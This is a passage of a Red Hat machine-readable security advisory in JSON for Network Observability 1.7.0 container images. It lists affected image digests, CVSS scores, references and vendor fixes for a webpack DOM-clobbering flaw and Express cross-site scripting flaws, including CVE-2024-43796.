"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43796",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:28.106254+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
